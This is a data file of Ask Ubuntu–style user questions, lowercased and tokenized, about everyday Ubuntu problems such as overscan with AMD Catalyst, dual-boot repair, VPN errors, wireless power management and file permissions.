509571	how to fix overscan , using amd catalyst control center aka fglrx or something else ?	i want ubuntu to use it on my old desktop connecting it to my tv . first problem i encountered was a problem with overscan . i figured that my best option would be to download amd catalyst control center and fix the overscan from there . then i encountered the problem being that i coud n't download it . i went into terminal and wrote bunch of stuff like : > sudo apt-get install fglrx > sudo apt-get install gksu this did n't work . now i download it from website . the installation process says that fglrx was already installed . i went into ubuntu sofware center and uninstalled everything that had to do with amd or fglrx which was previously installed . rebooted and tried to install package from amd once again . still same error message saying that older version is installed . still when i open activities and search amd , no results . next try is : > fglrxinfo command not found fglrx apperantly was not installed since i got this error message . so i did : > sudo apt-get install fglrx fglrx is already the newest version . how to download catalyst control center or just avoid it all together for a better way to fix the overscan ?
509574	file manager opens twice in ubuntu 14.04	i have a window of the file manager already opened , and when i click the icon button in the side panel to view that window , another instance of the file manager opens . is this the expected behaviour ?
509576	to to fix my lap with problem about re partition	i 've just tried to install ubuntu , and i think i did something wrong while installing it . when it finished , my laptop can not boot to ubuntu , and it said : error : attempt to read or write outside of disk 'hd0 ' entering rescue mode grub_rescue > _ so , i decided to re-partition to nfts to install windows by using hiren boot disc . but it wo n't work . it still says linux swap and ext3 after i tried to delete those partition and create a new partition . please help me .
509577	how to convert arabic subtitles to utf8 the right way ?	most dvd burners ( if not all ) ask for subtitles to be encoded in utf8 , sure that 's easy for file in *.srt ; do â iconv -f iso-8859-1 -t utf-8 -o `` $ file '' .utf `` $ file '' & & mv `` $ file '' .utf `` $ file '' â done that 's what but now arabic subtitles are anything but arabic , not all of them are in iso-8859 , they are either iso-8859-6 and some arabic windows cp1256 ( i do n't what is the encoding of each file , it 's either this or that , ca n't check them all one by one , it will take a lifetime ) how can i convert them to utf8 while still having readable subtitles , i saw few software for windows claiming they can do that . what about linux , i do n't really care if it 's a software or a bash script
509578	gateway ml3109 only boots with `` acpi=off ''	i have a gateway ml3109 that i have installed lubuntu 14.04.1 lts 64 bit on . i used the alternate installer , and the acpi=off option during the install . my system will only boot with the parameter `` acpi=off '' . this has also created another problem , my laptop will not shut down , i have to do it manually . i am worried about the temperature of my system . how can i configure acpi to work properly ? or , how can i tell if my system is acpi compatible ?
509584	low fps when using nomodeset	i have an hp pavilion tx2560es . i can only get ubuntu 14.04 to boot with the nomodeset option , but that gives me very slow animations ( apps opening/closing , lag in the text editors , etc ) . if i boot it without nomodeset it works fine for a while until the screen just freezes and glitches and the only way out is a forceful shutdown . any help ?
509586	openvpn : the vpn connection to ... because of invalid vpn secrets	i am 3 days into using linux . i set up an openvpn connection following the instructions set out by : https : //www.goldenfrog.com/support/vyprvpn/vpn-setup/linux/openvpn openvpn installation went smoothly . the problem arose when i tried to connect . after setting up the connection : i went to the connections are and selected my vpn . the error message i get isthe vpn connection to `` my vpn '' because of invalid vpn secrets . there are no additional prompt or areas to input commands . the dialog box disappears after sometime . now my computer is ancient ( the reason i installed ubuntu at first ) so i do n't have a wireless adapter . i 'm connecting via an ethernet cable but i notice that the vpn connection when it is attempting a connection looks like its attempting to connect to the vpn over wi-fi . the connected symbol changes from 2 arrows in opposite directions to the wi-fi symbol . other than that i 'm not quite sure what else could be causing it . i 've read that the problem lies with keyring issues but i do n't get any prompts to access my keyring so it looks like the solution has to be in the initial set up . how can i solve the vpn secrets error on 14.04 when connecting to the internet via an ethernet cable ?
509587	ubuntu crawls in virtualbox	i 'm using ubuntu 14.04 in virtualbox , and every action ( from opening applications to alt-tabbing from terminal to desktop ) crawls . i 'm in windows 8 which works fine , but it just seems like ubuntu is unnaturally slow . was it something i set up incorrectly , or a compatibility issue ?
509588	youtube videos do n't play on facebook . ( chromium )	i just started using chromium on ubuntu 14.04 and i went on my facebook profile page and wanted to start a video that i posted there from youtube and saw that it did n't work . it says that a plugin for this video is missing . here is the screen shot to . http : //s29.postimg.org/skvnhe6jr/screenshot_from_2014_08_11_02_14_38.png
509591	how do you install ubuntu 14.4.1 inside windows 7 or vista ?	i keep getting this error message ubuntu cd boot helper an error occurred : could not retrieve the required installation files for more information , please see the log file : d : \users\abua\appdata\local\temp\wubi-14.04-rev286.log ok
509592	boot-repair fails ( uefi and pre-installed windows 8 )	i have bought a new laptop , toshiba satellite nb10t-a-101 , with pre-installed windows 8 , after one day of figuring out how to install ubuntu in uefi i finally managed to do it ( which wasn´t easy , as m $ , intel and toshiba have made it more difficult with this model ) . it installed correctly . i created new partitions ( making space beforehand in windows 8 ) . however after the installation the windows boot manager turns on , with both windows 8 and ubuntu options . after selecting ubuntu i am getting the same wubi error as described here : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains error . which is already strange , as i thought the installation was in efi mode ( note- the secure boot option was disabled since the beginning , so this shouldn´´t be the cause ) . however after going to the `` repair '' options , the windows menu appears ( the same menu that allows to enter uefi configuration ) , and in the `` boot from device '' option one additional figure appears- `` ubuntu '' which boots directly into the previously installed ubuntu ( 14.04.1 lts ) . at this point i hoped the boot-repair would help . i followed the instructions from here : https : //help.ubuntu.com/community/uefi ( `` converting ubuntu into efi mode '' ) , unfortunately it does not help and i am getting this error : an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/8012282/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . please disable secureboot in the bios . a broken wubi has been detected . please fix it this way : https : //wiki.ubuntu.com/wubiguide # cannot_boot_into_ubuntu after rebooting i am getting the same initial error ( missing wubi file ) and can only enter ubuntu as described above . why is ubuntu still looking for the wubi ? how can i repair the boot options , maintaining dual-boot with windows ? ( unfortunately i still need windows for one program that won´t emulate , also the shop salesman told me i would loose warranty if i delate windows ) i´m a beginner user and getting to this point was very hard- please , use simple explanations : ) edit : photograps of the boot process . after the error message i can go to the other windows menu and `` boot from device ''
509593	lightdm password image miss-functioning	how may i fix lightdm password zone image when it 's like overlapted or not being shown properly ... see this : ( no reputation to show image ) ... .password zone of lightdm looks gray colored so as a result , blurry .
509594	ubuntu 14.04 and 12.04	i am new to ubuntu and have a 12.04 operating system . i want to upgrade to 14.04 . can i do this ? also if i can will this replace the 12.04 or will both 12.04 and 14.04 be on here .
509595	is rhythmbox constantly downloading mp3 files while playing them ?	i observed a strange phenomenon with my rhythmbox : it seems that rhythmbox is constantly downloading a mp3 file while playing it . my setup my home server ( hostname nas ) which host the mp3 files uses debian gnu/linux 7.6 ( wheezy ) , up-to-date too . the files are on a raid 1 with 2 disks . it shares the files through a samba share , the configuration file only contains the different mount points ( i did n't changed any configuration ) . my local computer runs rhythmbox 3.0.2 and ubuntu 14.04.1 lts , everything is up-to-date . the samba share is mounted with a cifs mount point in /etc/fstab : //nas/raid /mnt/nas cifs _netdev , rw , users , iocharset=utf8 , uid=1000 , sec=none , file_mode=0777 , dir_mode=0777 0 0 i disabled the auto-discovery of new files in the library and fadding between files in the settings of rhythmbox . screenshots here is a screenshot of the system monitor after starting to play a mp3 file with rhythmbox : we can see a peak at 32 mib/s after i clicked on play . the size of the file is only 4.6 mb , the difference between the peak and the actual size of the file may only be an artefact of the system monitor . after 10 seconds i pressed pause , then 10 seconds later i pressed play , and repeated this pattern . we can see that when rhythmbox is playing the mp3 something is downloaded at a speed of 2 mib/s . but there is no network activity when rhythmbox is paused . so this implies that all the network activity is due to rhythmbox . here is the result with another mp3 file , with a size of 8 mb : it looks like rhythmbox download data every 45 seconds to cache a part of the mp3 file before playing it . comments so i do n't understand why rhythmbox seems to download constantly the same file instead of using a cache or a buffer . i restarted rhythmbox and played the file i used for the first screenshot and it looked like the second screenshot : bandwidth was only used after i pressed play and every 45 seconds . so the problem is also appearing randomly .
509598	second screen not working with kubuntu 14.4 or any other ubuntu os	i have an nvidia geforce graphics card and have been searching for weeks for a fix to get both screens working and have no idea how to fix this issue . both screens are hooked up with hdmi cables . i am fairly new to kubuntu so if i can get step by step instructions walking me through a fix for the issue .
509601	why is everything write protected ?	i have searched and searched and ca n't find anything specific to my problem . i am a mac user , new to ubuntu . i wiped my hp notebook and installed 32-bit ( no choice ) ubuntu . then i installed the lamp server followed by phpmyadmin . my html folder was installed inside of root ( / ) . a shortcut to phpmyadmin is inside of that . every time i try to do anything with web files , i get permission denied . i created a file with sublime text , later double-clicked on it and when it opened in gedit , i could n't save changes because permission was denied . i can understand needing permission to write to the root folder . why , then , is my www folder , something i would write to often , installed there ? it 's useless to me there if i have to jump through hoops to do anything . as a shot in the dark , am i supposed to create a www folder in my home folder and map it to /var/www/html or vice versa ? if so , how do i do that ?
509603	applications greyed out and non responsive	installed ubuntu 14.04 , applications on ubuntu are very slow and non responsive . most of the time windows are greyed out and becomes non responsive . any help please ?
509608	incorrect shell password correct terminal password	i 'm trying to make some changes from the ctrl+alt+f1 menu , but the shell only rejects my login ( `` login incorrect '' message ) . this is the same login and password that is accepted everywhere else i 'm asked for one . no , it is not an error of my typing . what is the deal ? i changed my computer 's name recently , could that be getting in my way ?
509609	how to edit the notification configuration ?	the notification blip that usually comes on top-right and becomes slightly transparent on hover gets its colour from the background wallpaper , but can i edit it with more options ? if yes , then how ?
509610	switching between ubuntu and windows does not work . windows wo n't mound and i am stuck in ubuntu . i have an asus uefi bios . help	in order to switch to microsoft windows 8.1 from ubuntu i would go into my bios and click f8 to get to a menu where i can pick what to boot from . i clicked on my hard drive ( were i have both ubuntu and windows ) as usual . after that it should have gone into another menu were i could choose which operating system i wanted to boot into , but it did n't and it went straight into ubuntu i am trying to fix it and so i went into settings and when i clicked on the section that shows the hard drive space partitioned for windows it said this : unable to access `` 649 gb volume '' error mounting /dev/sda2 at /media/jd/543652053651e88e : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/jd/543652053651e88e '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . does anyone know how i can fix this so i can get back into windows ? could i just reinstall windows 8.1 through a disk .
509611	scheduled tasks wo n't run simple command	the command below works fine in terminal but wo n't run using the gnome scheduled tasks . pacmd set-sink-volume 0 42768
509612	wireless internet	i just installed ubuntu 14.04.1 on an hp pavilion dv 4000 laptop . it does not show any wireless networks to connect to . the computer has a switch on the keyboard to turn on wireless , but it does n't work now . it was working when i was running windows xp yesterday . please advise how to get the wireless working .
509613	how to downgrade hwe ?	i was running ubuntu 12.04 lts and was accepting all suggested upgrades . about a week ago i was prompted to upgrade the hardware enablement stack because it was going out of support . so i did and i upgraded to 12.04.5 . unfortunately this upgrade brought multiple problems to my computer : if i send computer to sleep it does not recover , and if i shut it down , it restarts automatically for now apparent reason . now i want to undo the upgrade that i made last week . is there a simple way to do that ?
509617	vim command does not work	i am trying to open vim on my ubuntu 14.04 64 bit by entering the command in the terminal : vim but i get the response : the program 'vim ' can be found in the following packages : * vim * vim-gnome * vim-tiny * vim-athena * vim-gtk * vim-nox try : sudo apt-get install < selected package > but i assume ( wrongly ? ) that vim comes by default in the distro . i confirm this by checking the installed packages : dpkg -- get-selections | grep -v deinstall > ~/desktop/packages it lists vim-common and vim-tiny . so why does n't vim open up ? on the other hand , if i enter the command vi , it opens up vim in vi compatible mode .
509619	network driver updates for compaq presario cq57	i have ubuntu 14.04.1 on my laptop and i was wondering if there were any updates for the network driver . the wifi is slow and i am not getting the full bandwidth . if you can put the updates in the terminal format , thanks .
509620	unable to upload files ( pdfs , images ) larger than 1 mb	i have recently started php and mysql project development on ubuntu . in one part of the project i need to upload files . but my script is not uploading anything larger than 1 mb nor does it show any error . smaller files are uploading fine . so i think my script is ok . besides i have made suitable changes in both php.ini and my.cnf files . can someone please tell me other possible reasons for this ?
509623	installation procedure for numpy and other python-3.4 packages on ubuntu 14.04	i am new to ubuntu and installed ubuntu 14.04 32 bit on my lenovo hinkpad t410 machine with windows 7 two days ago but since then trying download and install python-3.4 packages ( numpy , scipy ) on ubuntu and not getting results . i have downloaded idle through ubuntu software centre but numpy neither run for me from ubuntu software centre nor from commands . sudo apt-get install python-numpy it gives me : e : unable to locate package python-numpy_1.8.1-1ubuntu1_i386 e : could n't find any package by regex 'python-numpy_1.8.1-1ubuntu1_i386' i also tried : pip install python-numpy but it results : could not find any downloads that satisfy the requirement python-numpy cleaning up ... no distributions at all found for python-numpy storing debug log for failure in /home/sibte/.pip/pip.log any guide for the very beginners to ubuntu .
509626	why do i get failed to execute child process ?	so , i have a .sh file on my desktop , and i want to run it in the terminal . the first line is # ! /bin/bash , then a blank line , then my command . i choose run in terminal when i double click it , and it gives me : there was an error creating the child process for this terminal failed to execute child process `` /home/ ( my name ) /desktop/run.sh '' ( no such file or directory ) thunder bolts and lightning , very very frightening ! so , it is there , why is n't terminal opening it ?
509628	getting a drive to automount on startup	i 've got a drive ( well , a separate partition actually ) that has my music on it , and in theory i should just be able to hit play in rhythmbox and it 'll work . but for some reason , i need to personally go into the drive and just open the drive before rhythmbox will actually realise the files are still there . a partial solution seemed to have been to put the following command into the startup applications list : -- mount /dev/sdb4 but that only worked when i logged in and out to test it . it does n't actually work when booting up . edit : i 've just noticed that the drive is no longer being listed by ubuntu automatically . i can see it if i look for it under drives , but its not automatically coming up .
509629	sending data to port does not seem to be working on ubuntu linux ?	i am trying to send data to port 2003 i am using tcpflow to listen however i can not see any data being printed or sent ? sending data to port 127.0.0.1 2003 echo hello | nc localhost 2003 or echo `` test.count 4 `date + % s` '' | nc -q0 127.0.0.1 2003 listening data tcpflow -i lo port 2003 tcpflow : listening on lo
509632	variable.sh is not exporting the variable using terminal	i want to export many paths using a .sh script . after running it nothing is exported i do n't know why . so if anyone can advise . this is the script used : # ! /bin/bash txtrst= $ ( tput sgr0 ) # text reset txtred= $ ( tput setaf 1 ) # red echo `` $ { txtred } # # sourcing the variables # # $ { txtrst } '' t_d_l=/home/ t_d= $ t_d_l after that i use echo $ t_d_l but nothing happens
509633	i ca n't save steam games to external flash drive because it is read-only , help ?	i researched online for a while and found out to save games to my external i would have to change the properties on my flash drive to read and write . however i do not have ownership for some reason . i then went online and tried to find out how to gain ownership but it denied permission . i was able to change the drive from 0755 to 0777 though . any thoughts on fixing this problem ?
509639	making full disk image with dd	it is possible to make a full disk image with running ubuntu with following command : dd if=/dev/sda of=/image_name after i make it , how can i restore that image on a crushed system ?
509642	small snag when installing wine	i was installing wine on a fresh install of 14.10 , and i was sent to some dos-looking screen . i hit enter to get through the eula , but i think i accidentally hit it twice because it sped through a screen and told me the fonts would not be installed . how will this affect wine and is there any way i can go back to this ?
509643	will ubuntu continue working properly after a new motherboard/cpu is installed ?	so , i installed the new motherboard and new cpu . then powered on the pc . the bootstrapping went fine and all seems to work . but i have doubts . do i need to do something ?
509646	open with open office	i just installed open office from the deb package . by default , it is installed in /opt so i can start oo writer with : /opt/openoffice4/program/soffice but , i want it to automatically open .docx files . when i right-click on a docx file and select `` open with '' , it does n't let me select open office . how can i tell ubuntu to always open docx files with /opt/openoffice4/program/soffice ? i have ubuntu 12.04 .
509647	script in bash not understood using terminal in ubuntu 12.04	can anyone tells me what does this script means found in a .sh file : : [ ! -n `` $ t_r '' ] & & echo `` message appear '' & & exit 1 ;
509648	ubuntu 14.04 adm catalyst 14.3 missing scaling adjustment	having just upgraded to ubuntu lts 14.04 i also installed the latest stable amd catalyst for my a8 apu . the display is now suffering from underscan , which can not be adjusted in the monitor . unfortunately amd catalyst 14.3 is missing the useful scaling slider that was available in earlier versions . anyone know how underscan/ overscan problems can now be resolved ? thanks
509649	lvds connect issue . ( if vga connect . lvds off )	i have very hard problem . and i do n't solute have n't found a solution for this problem while for 3 weeks . now tested os ( ubuntu 14.04 , ubuntu 12.10 , ubuntu 12.04 ) same problem . physical connected vga and lvds . but if vga connected , lvds screen off . i do n't now why this problem . somebody help cpu : $ cat /proc/cpuinfo intel ( r ) atom ( tm ) cpu n270 @ 1.60ghz os : $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.10 distrib_codename=quantal distrib_description= '' ubuntu 12.10 '' grapic card : $ lspci 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) bios vga setting : - on-chip frame buffer size : 8mb - dvmt mode : both - dvmt/fixed memory size 128mb - boot display crt+lcd ( 24bit ) - panel number 800x600 24/1 x info : 1 . version : x.org x server 1.13.0 release date : 2012-09-05 x protocol version 11 , revision 0 build operating system : linux 3.2.0-54-generic i686 ubuntu current operating system : linux lotto-desktop 3.5.0-51-generic # 76-ubuntu smp thu may 15 21:19:44 utc 2014 i686 kernel command line : boot_image=/boot/vmlinuz-3.5.0-51-generic root=uuid=01ccefaf-b010-4a6b-a11c-717305a70dc0 ro quiet splash vt.handoff=7 build date : 05 november 2013 03:14:52pm 2 . configure : $ cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ ] # option `` kmsdev '' # # option `` shadowfb '' # [ ] identifier `` card0 '' driver `` modesetting '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ ] # option `` accelmethod '' # # option `` backlight '' # # option `` dri '' # [ ] # option `` colorkey '' # # option `` videokey '' # # option `` tiling '' # [ ] # option `` linearframebuffer '' # [ ] # option `` swapbufferswait '' # [ ] # option `` xvpreferoverlay '' # [ ] # option `` hotplug '' # [ ] # option `` relaxedfencing '' # [ ] # option `` xvmc '' # [ ] # option `` throttle '' # [ ] # option `` zaphodheads '' # # option `` delayedflush '' # [ ] # option `` tearfree '' # [ ] # option `` percrtcpixmaps '' # [ ] # option `` fallbackdebug '' # [ ] # option `` debugflushbatches '' # [ ] # option `` debugflushcaches '' # [ ] # option `` debugwait '' # [ ] # option `` buffercache '' # [ ] # option `` triplebuffer '' # [ ] identifier `` card1 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ ] # option `` accelmethod '' # # option `` backlight '' # # option `` dri '' # [ ] # option `` colorkey '' # # option `` videokey '' # # option `` tiling '' # [ ] # option `` linearframebuffer '' # [ ] # option `` swapbufferswait '' # [ ] # option `` xvpreferoverlay '' # [ ] # option `` hotplug '' # [ ] # option `` relaxedfencing '' # [ ] # option `` xvmc '' # [ ] # option `` throttle '' # [ ] # option `` zaphodheads '' # # option `` delayedflush '' # [ ] # option `` tearfree '' # [ ] # option `` percrtcpixmaps '' # [ ] # option `` fallbackdebug '' # [ ] # option `` debugflushbatches '' # [ ] # option `` debugflushcaches '' # [ ] # option `` debugwait '' # [ ] # option `` buffercache '' # [ ] # option `` triplebuffer '' # [ ] identifier `` card2 '' driver `` intel '' busid `` pci:0:2:1 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ ] # option `` rotate '' # # option `` fbdev '' # # option `` debug '' # [ ] identifier `` card3 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ ] # option `` defaultrefresh '' # [ ] # option `` modesetclearscreen '' # [ ] identifier `` card4 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card1 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' modes `` 800x600 '' endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' defaultdepth 24 subsection `` display '' modes `` 800x600 '' endsubsection endsection 3. xrandr output : lvds1 connected , vga1 non-connected $ xrandr -- verbose screen 0 : minimum 320 x 200 , current 800 x 600 , maximum 4096 x 4096 vga1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x41 timestamp : 1940078 subpixel : unknown clones : lvds1 crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : lvds1 connected 800x600+0+0 ( 0x45 ) normal ( normal left inverted right x axis y axis ) 0mm x 0mm identifier : 0x42 timestamp : 1940078 subpixel : horizontal rgb gamma : 1.0:1.0:1.0 brightness : 1.0 clones : vga1 crtc : 0 crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 800x600 ( 0x45 ) 40.0mhz -hsync -vsync *current +preferred h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x46 ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x47 ) 36.0mhz +hsync +vsync h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0x48 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz tv1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x43 timestamp : 1940078 subpixel : unknown clones : crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : bottom margin : 37 ( 0x00000025 ) range : ( 0,100 ) right margin : 46 ( 0x0000002e ) range : ( 0,100 ) top margin : 36 ( 0x00000024 ) range : ( 0,100 ) left margin : 54 ( 0x00000036 ) range : ( 0,100 ) mode : ntsc-m supported : ntsc-m ntsc-443 ntsc-j pal-m pal-n pal 480p 576p 720p @ 60hz 720p @ 50hz 1080i @ 50hz 1080i @ 60hz 4. xrandr output : now physical lvds1 connected , vga1 connected $ xrandr -- verbose screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 4096 x 4096 vga1 connected 1920x1080+0+0 ( 0x45 ) normal ( normal left inverted right x axis y axis ) 477mm x 268mm identifier : 0x41 timestamp : 9242568 subpixel : unknown gamma : 1.0:1.0:1.0 brightness : 1.0 clones : lvds1 crtc : 0 crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff004c2e9a303e593f1e 2f1401030e351c782a3581a656489a24 1250542308008100814081809500a940 b30001010101023a801871382d40582c 4500dd0c1100001e792e401062842030 70981300bbf91000001c000000fd0038 4b1e5f12000a202020202020000000fc 004c4344204d4f4e49544f520a200068 1920x1080 ( 0x45 ) 148.5mhz +hsync +vsync *current +preferred h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1600x1200 ( 0x46 ) 162.0mhz +hsync +vsync h : width 1600 start 1664 end 1856 total 2160 skew 0 clock 75.0khz v : height 1200 start 1201 end 1204 total 1250 clock 60.0hz 1680x1050 ( 0x47 ) 146.2mhz -hsync +vsync h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1050 start 1053 end 1059 total 1089 clock 60.0hz 1600x900 ( 0x48 ) 119.0mhz -hsync +vsync h : width 1600 start 1712 end 1864 total 2128 skew 0 clock 55.9khz v : height 900 start 901 end 904 total 932 clock 60.0hz 1280x1024 ( 0x49 ) 108.0mhz +hsync +vsync h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1440x900 ( 0x4a ) 106.5mhz -hsync +vsync h : width 1440 start 1520 end 1672 total 1904 skew 0 clock 55.9khz v : height 900 start 903 end 909 total 934 clock 59.9hz 1280x960 ( 0x4b ) 108.0mhz +hsync +vsync h : width 1280 start 1376 end 1488 total 1800 skew 0 clock 60.0khz v : height 960 start 961 end 964 total 1000 clock 60.0hz 1280x800 ( 0x4c ) 83.5mhz +hsync -vsync h : width 1280 start 1352 end 1480 total 1680 skew 0 clock 49.7khz v : height 800 start 803 end 809 total 831 clock 59.8hz 1024x768 ( 0x4d ) 65.0mhz -hsync -vsync h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x4e ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x4f ) 36.0mhz +hsync +vsync h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0x50 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz lvds1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x42 timestamp : 9242568 subpixel : horizontal rgb clones : vga1 crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : tv1 disconnected ( normal left inverted right x axis y axis ) identifier : 0x43 timestamp : 9242568 subpixel : unknown clones : crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : bottom margin : 37 ( 0x00000025 ) range : ( 0,100 ) right margin : 46 ( 0x0000002e ) range : ( 0,100 ) top margin : 36 ( 0x00000024 ) range : ( 0,100 ) left margin : 54 ( 0x00000036 ) range : ( 0,100 ) mode : ntsc-m supported : ntsc-m ntsc-443 ntsc-j pal-m pal-n pal 480p 576p 720p @ 60hz 720p @ 50hz 1080i @ 50hz 1080i @ 60hz 5 . log : i think this line very strange . why disconnected lvds ? [ 10.813 ] ( ii ) intel ( 0 ) : output vga1 connected [ 10.813 ] ( ii ) intel ( 0 ) : output lvds1 disconnected [ 10.813 ] ( ii ) intel ( 0 ) : output tv1 disconnected if you need to all log . i will post that . that 's very long .
509650	why is my wireless network adapter acting in a strange way ? ( ubuntu 14.04 )	i have a laptop with intel centrino advanced-n 6235 wireless network card , and i 'm on ubuntu 14.04 . for almost a week i have had a strange problem with my wireless card . when i plug in the power cable , the network card stays connected to the access point , but stops receiving altogether , but works completely normal on battery . from the little digging around , i was narrow it down as a power management related issue . by design when i 'm running the laptop on battery , the wireless card is in power management : on status , as verified by sudo iwconfig command . when i plug in the power cable , it goes into power management : off status , and stops receiving . upon manipulating it with sudo iwconfig wlan0 power on , while still connected to the ac power , the power management is turned on , and the card starts to function normally . the same laptop does not have this trouble when booted in windows 7 , so i do n't think it is an os independent case of faulty component . is there a sophisticated solution to it , or do i need to rely on some shoddy script to execute sudo iwconfig wlan0 power on , every time i plug in the power cable ?
509657	icons appeared alone and i ca n't delete them	it 's very strange , the computer freeze and i restart it . after the restart i saw 3 icons appeared on the desktop . i ca n't delete them ! right click - `` delete '' is not active , as well as the keybord . when i opened the desktop folder they are not there as well ! how can i remove them ? how they appeared there when i did n't put them there ? why i do n't have rights to delete them when i 'm administrator . why the trash does n't empty when i click on `` empty trash '' . so my questions are : how these icons appeared there ? how can i delete them , because i do n't want them ? why the trash can not be empty ? simply does n't work . why as admin i do n't have the rights to delete that icons ? why these icons does n't appear in `` desktop folder '' ? i removed all programs for tuning and installed again unity tweak tool and gnome tweak tool . again nothing ... i still ca n't remove that icons and i still ca n't empty the trash .
